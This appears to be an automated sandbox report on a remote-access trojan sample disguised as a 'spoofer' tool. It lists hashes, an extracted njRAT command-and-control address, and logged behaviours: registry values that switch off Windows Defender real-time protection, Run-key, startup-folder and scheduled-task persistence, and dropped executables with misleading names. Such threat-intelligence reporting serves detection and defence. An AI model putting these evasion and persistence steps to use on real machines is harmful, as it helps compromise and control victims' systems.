asyncrat | a7a2d404968fdc9586430de3cc202457ceea41c2eab0bc3d854473f05f9e528b

Analysis

max time kernel
299s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
28-09-2022 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mystery_Spoofer.exe
Size

1.1MB
MD5

f4169900047993944662a486d3a8ca34
SHA1

9be30fd214ec41b8f97169e270d4f63e44690808
SHA256

a7a2d404968fdc9586430de3cc202457ceea41c2eab0bc3d854473f05f9e528b
SHA512

6a51b9050d16ed50f222401dde7972165b1c7ef69ecd1ef5346f06d6ee36499366e91be5f783d6eb0ce6535cb8847422a02795bc1008204ff3f03ccf0d6bce40
SSDEEP

12288:IZCK+TS9sInf8LIDJlXmYcDWa/pPdqC2MOTdo4tXwZ4FqhWhO9T:IqD3LirSRt5OuOAqF

Score

10^/10

asyncrat njrat try09 evasion persistence rat trojan

Malware Config

Extracted

Family

njrat

Version

v4.0

Botnet

try09

microsoft-window.servehttp.com:6552

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

WScript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe	asyncrat
C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe	asyncrat
behavioral1/memory/1016-167-0x0000000000E70000-0x0000000000EF6000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe	asyncrat
C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 4640 powershell.exe

flow	pid	process
12	4640	powershell.exe

Executes dropped EXE 10 IoCs

Processes:

File.bat.exeWindows.exeQUFUCK.exeASFUCK.exeNvidiaXdriver.exeWindows.exeOneDriveStandaloneAPIMethod.exeNvidiaXdriver.exeNvidiaXdriver.exeNvidiaXdriver.exe

pid	process
4288	File.bat.exe
2760	Windows.exe
4400	QUFUCK.exe
1016	ASFUCK.exe
5164	NvidiaXdriver.exe
5380	Windows.exe
3376	OneDriveStandaloneAPIMethod.exe
5856	NvidiaXdriver.exe
1304	NvidiaXdriver.exe
4580	NvidiaXdriver.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

File.bat.exeWScript.exeWScript.exeWindows.exeNvidiaXdriver.exeNvidiaXdriver.exeMystery_Spoofer.exeNvidiaXdriver.exeNvidiaXdriver.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	File.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	NvidiaXdriver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	NvidiaXdriver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Mystery_Spoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	NvidiaXdriver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	NvidiaXdriver.exe

Drops startup file 5 IoCs

Processes:

attrib.exeWindows.exeWindows.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Windows.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Windows.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Windows.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	Windows.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

NvidiaXdriver.exeWindows.exeQUFUCK.exeWindows.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaXdriver = "\"C:\\Program Files (x86)\\SubDir\\NvidiaXdriver.exe\""	NvidiaXdriver.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Windows.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Windows.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Windows.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	Windows.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaXdriver = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\QUFUCK.exe\""	QUFUCK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Windows.exe"	Windows.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ip-api.com

flow	ioc
29	ip-api.com

Drops file in Program Files directory 10 IoCs

Processes:

NvidiaXdriver.exeNvidiaXdriver.exeNvidiaXdriver.exeNvidiaXdriver.exeQUFUCK.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\SubDir	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir	NvidiaXdriver.exe
File created	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	QUFUCK.exe
File opened for modification	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	QUFUCK.exe
File opened for modification	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir	NvidiaXdriver.exe
File opened for modification	C:\Program Files (x86)\SubDir\NvidiaXdriver.exe	NvidiaXdriver.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5552 3376 WerFault.exe OneDriveStandaloneAPIMethod.exe

pid	pid_target	process	target process
5552	3376	WerFault.exe	OneDriveStandaloneAPIMethod.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5856	schtasks.exe
4732	schtasks.exe
1904	schtasks.exe
5796	schtasks.exe
3336	schtasks.exe
1660	schtasks.exe
624	schtasks.exe
5916	schtasks.exe
676	schtasks.exe
5364	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

476 timeout.exe

pid	process
476	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe

Modifies registry class 64 IoCs

Processes:

SearchApp.exeSearchApp.exeSearchApp.exeFile.bat.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "8995"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "6860"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8933"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "8995"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1312"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2693"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2693"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2693"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	File.bat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "8900"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8995"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "6646"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8900"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "8933"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "15271"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "10835"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "6860"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "8669"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "6860"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "6860"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "6860"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8669"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "15271"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1312"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1312"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	SearchApp.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

OneDriveStandaloneAPIMethod.exe

pid process

3376 OneDriveStandaloneAPIMethod.exe

pid	process
3376	OneDriveStandaloneAPIMethod.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeFile.bat.exepowershell.exepowershell.exeASFUCK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeQUFUCK.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4640	powershell.exe
4640	powershell.exe
4288	File.bat.exe
4288	File.bat.exe
2468	powershell.exe
2468	powershell.exe
2352	powershell.exe
2352	powershell.exe
2352	powershell.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
1016	ASFUCK.exe
2284	powershell.exe
2284	powershell.exe
3292	powershell.exe
3292	powershell.exe
2272	powershell.exe
2272	powershell.exe
536	powershell.exe
536	powershell.exe
3456	powershell.exe
3456	powershell.exe
1016	ASFUCK.exe
2276	powershell.exe
2276	powershell.exe
4888	powershell.exe
4888	powershell.exe
1016	ASFUCK.exe
4400	QUFUCK.exe
4400	QUFUCK.exe
4400	QUFUCK.exe
4400	QUFUCK.exe
4400	QUFUCK.exe
4400	QUFUCK.exe
1016	ASFUCK.exe
2712	powershell.exe
2712	powershell.exe
3696	powershell.exe
